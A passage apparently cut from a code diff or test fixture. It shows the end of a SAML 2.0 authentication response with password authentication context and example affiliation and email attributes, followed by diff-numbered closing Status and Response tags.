SessionIndex="_02f26af30a37afb92081f3a73728810193efd7fa6e"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement><saml:AttributeStatement><saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.1" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"><saml:AttributeValue xsi:type="xs:string">member</saml:AttributeValue></saml:Attribute><saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.6" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"><saml:AttributeValue xsi:type="xs:string">student@example.edu</saml:AttributeValue></saml:Attribute></saml:AttributeStatement></saml:Assertion></samlp:Response>
|
|
41
|
+
</samlp:StatusDetail>
|
|
42
|
+
</samlp:Status>
|
|
43
|
+
</samlp:Response>
|
|
44
|
+
|